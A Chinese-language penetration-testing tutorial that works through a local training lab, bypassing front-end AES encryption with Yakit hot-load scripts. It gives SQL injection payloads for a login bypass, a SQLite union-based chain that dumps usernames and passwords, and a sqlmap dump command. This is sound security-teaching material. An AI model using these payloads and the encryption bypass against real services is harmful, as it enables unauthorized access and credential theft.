渗透测试-前后端加密分析之AES加密下的SQL注入

本文是高级前端加解密与验签实战的第9篇文章，也是最后一篇文章。本系列文章实验靶场为Yakit里自带的Vulinbox靶场，本文讲述的是绕过前后端加密进行SQL注入。

登录

输入账号密码，抓包查看数据包，看上去就是一个普通的aes加密:

这里热加载代码不算太难，常规的加解密函数就可以了：

encryptAES = (packet) => {
    body = poc.GetHTTPPacketBody(packet)
    // 生成随机key和iv
    key =  randstr(16)
    iv = randstr(12)
    // 加密数据
    data = codec.AESCBCEncrypt(key /*type: []byte*/, body, iv /*type: []byte*/)~
    data = codec.EncodeBase64(data)
    // 获取key和iv的hex值
    hexKey = codec.EncodeToHex(key)
    hexIV = codec.EncodeToHex(iv)
    // 构造新的body
    body = f`{"key": "${hexKey}","iv": "${hexIV}","message": "${data}"}`

    return poc.ReplaceBody(packet, body, false)
}

decryptAES = (packet) => {
    body = poc.GetHTTPPacketBody(packet)
    body = json.loads(body)
    key = codec.DecodeHex(body.key)~
    iv = codec.DecodeHex(body.iv)~
    data = codec.DecodeBase64(body.message)~
    data = codec.AESCBCDecrypt(key, data, iv)~
    return poc.ReplaceBody(packet, data, false)
}

beforeRequest = func(req){
    return encryptAES(req)
}
afterRequest = func(rsp){
    return decryptAES(rsp)
}

请求体格式

{"username":"admin","password":"password"}

热加载加解密成功

本关提示是SQL注入，所以直接啪一个1=1，说时迟那时快，直接登陆成功

POST /crypto/sqli/aes-ecb/encrypt/login HTTP/1.1
Host: 127.0.0.1:8787
Content-Type: application/json

{"username":"admin","password":"password'or 1=1--"}

注入

手工

登陆后看到请求了/crypto/sqli/aes-ecb/encrypt/query/users路径

解密一下请求包：

获取到请求的格式：

{"search":""}

这里是SQLite注入，注入的语句是通过这篇文章获取的：sqlite注入的一点总结 - 先知社区 (aliyun.com)

{"search":"user1'order by 3--"}

{"search":"user1'union select 1,2,3--"}

{"search":"user1'union select 11,22,sql from sqlite_master--"}

{"search":"user1'union select 11,22,sql from sqlite_master where type='table' and name='vulin_users'--"}

{"search":"user1'union select username,password,id from vulin_users--"}

注入成功：

POST /crypto/sqli/aes-ecb/encrypt/query/users HTTP/1.1
Host: 127.0.0.1:8787
Cookie: token=PLNqoZMZfiELLLFuTbmOtSrDdnpFmDDM
Content-Type: application/json
Content-Length: 119

{"search":"user1'union select username,password,id from vulin_users--"}

sqlmap

在MITM处加载热加载代码

使用sqlmap注入

python .\sqlmap.py -r .\http.txt --proxy=http://127.0.0.1:8081 --batch -dbms=sqlite -T vulin_users -C username,password,role --dump

http.txt

POST /crypto/sqli/aes-ecb/encrypt/query/users HTTP/1.1
Host: 127.0.0.1:8787
Cookie: token=PLNqoZMZfiELLLFuTbmOtSrDdnpFmDDM
Content-Type: application/json
Content-Length: 119

{"search":"*"}

效果：